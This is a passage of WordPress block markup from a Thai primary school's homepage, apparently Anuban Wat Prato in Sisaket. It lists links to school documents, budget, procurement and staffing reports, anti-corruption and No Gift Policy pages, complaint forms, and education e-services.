class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e